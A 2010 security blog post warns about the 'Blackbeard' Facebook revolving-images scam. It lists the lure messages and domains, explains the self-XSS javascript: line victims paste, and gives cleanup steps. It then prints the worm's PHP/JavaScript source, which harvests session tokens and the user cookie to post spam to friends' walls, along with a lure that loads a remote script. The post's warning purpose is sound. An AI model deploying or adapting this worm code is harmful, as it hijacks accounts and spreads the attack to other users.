stats for wordpress

Facebook Revolving image Scam script : Facebook Blackbeard worm

Posted 28 Nov 2010

You might have seen the latest revolving images scam in which your friends post some wall messages on your Facebook wall with a link . We have covered some facebook scams earlier ,but this one is far more dangerous than the previous one as it will give your personalized email for facebook updates to the hacker . This worm has been codenamed Blackbeard by the group of hackers and they are continuously improving their script . Earlier it was just facebook updates on your wall and writing something on others wall but now this also makes you fan of some facebook pages .

Really cool Facebook revolving images. MUST SEE http://rotatingimage2.tk/ .


You might also get several versions of this message :

Hi Frends, Just See Facebook Images Revolve!! WOW Its Amazing :) see here >>http://fbookcoolimages.tk/

Checkout 360 rotate effect on images. MUST SEE http://revolvingimages.info/fb/”

Some other domains that are used for spreading this Facebook worm are :

  • http://revolvingimages.info/fb/
  • http://kewlpics.tk/
  • http://itsmajic.tk/
  • http://bit.ly/91wrzd
  • http://bit.ly/faceb00ked
  • http://majicalimages.tk/

facebook revolving images

Reasons behind the problem :

Most the people are running this javascript while they are logged into the Facebook  :

javascript:(a=(b=document).createElement("script")).src="hackingjavascriptlink",b.body.appendChild(a);void(0)

Consequences of running the javascript on your profile :

  • It will update your facebook status plus it will post on your friends wall and it will spread the link of that scam website .
  • The hacker will gain access to your personalized email something like ( 1233bhjkkoo@m.facebook.com ) through which you update your facebook status . Since sending an email to this email address will update your Facebook status anytime ,the hacker can update your Facebook Wall as long as you don’t change the email .
  • Please remember after running the javascript ,the hacker won’t be getting your user id or password
  • You will also automatically like some facebook fan pages due to this action of yours .

Here’s the solution to this if you got affected the worm created :

  • You need to refresh your personalized email again so that the hacker don’t have access to your Facebook wall .
  • Go the Facebook Mobile from here http://www.facebook.com/mobile/ .
  • Scroll down to upload via email and you will find out and email address,that’s the email the hacker is using to update your Facebook account .
  • Click on find out more .
  • After this step you will find something like this :

  • So, now refresh your personalized email .
  • Since , you also might have liked some random facebook pages , so remove them manually by going through the tutorial we gave earlier for another facebook scam . You can also run a security scan on your facebook feed to check whether anyone sent you a malicious link or not .

We have also got the latest version of the source code used by the guys ,but we are deleting some versions of it for safety purpose :

<?php
header("Content-type: text/javascript");
if(isset($_GET['show'])){
    if(!isset($_SERVER['HTTP_REFERER'])) header("Location: http://www.facebook.com/");
    if(!preg_match("/facebook.com/", $_SERVER['HTTP_REFERER'], $isit)) header("Location: http://www.facebook.com/");
    echo <<<_HTML_

// script name : blackbeard
// author : Yash n friends
// be nice and dont remove credits ...

txt="msg1";  // Msg 1 to be spammed
txtee="msg2";   // msg 2 to be spammed
sitename="http://youtwebsite.com/themes/"; // your site name... must include / at end
nextfile="next.php"; // your log filename
yourpageid="101059326616167"; // your fanpage id
llimit=15; // number of ppl to spam (15 is a good limit)

//DONT EDIT BELOW THIS LINE
// Skip to last line and edit link in script
//==========================

alert("Please wait 2-3 mins while we process! Do not refresh this window or click any link.");
i = 0;
with(x = new XMLHttpRequest()) open("GET", "/"), onreadystatechange = function () {

    if (x.readyState == 4 && x.status == 200) {

        comp = (z = x.responseText).match(/name=\\\\"composer_id\\\\" value=\\\\"([\d\w]+)\\\\"/i)[1];
        form = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
        dt = z.match(/name="fb_dtsg" value="([\d\w-_]+)"/i)[1];
        pfid = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
        appid = "150622878317085";
        appname = "rip_m_j";

                t = setInterval(function () {
                    if (i >= llimit ) return;

if(i%2==0)
{
//update

with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"),
setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] +
"&status=" + txt + "&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id="
+ comp + "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form +
"&fb_dtsg=" + dt + "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest");

}
else
{
//update

with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"), setRequestHeader("Content-Type",
"application/x-www-form-urlencoded"), send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] +
"&status=" + txtee + "&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id=" + comp +
"&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt +
"&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest");

}

                    i += 1;
                }, 2000);
            }

        }, send(null);
    }
}, send(null);

_HTML_;
    exit;
}else{
    echo <<<_HTML_
Run this script in addressbar for free facebook themes: <br>
javascript:(a = (b = document).createElement("script")).src = "//youtwebsite.com/themes/index.php?show", b.body.appendChild(a); void(0)
_HTML_;
}
?>

Also if you really want to revolve the images of any page you can use this simple  javascript :

javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24;   x4=300; y4=200; x5=300; y5=200;  DI=document.getElementsByTagName("img");
DIL=DI.length; function  A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style;  DIS.position='absolute';  DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px";
DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5);   void(0);

On a new note some guys are bit more clever and they are using it with a different name like change your facebook theme or something similar . So, its better you don’t run javascripts on Facebook until and unless you yourself know what is contained in it .



Categories: Featured

One Response

  1. Facebook Revolving image Scam script : Facebook Blackbeard worm … « Zipsite.net - 29 Nov 2010 | Reply

    [...] Go here to read the rest: Facebook Revolving image Scam script : Facebook Blackbeard worm … [...]

Leave a Reply


Author:Varun Dave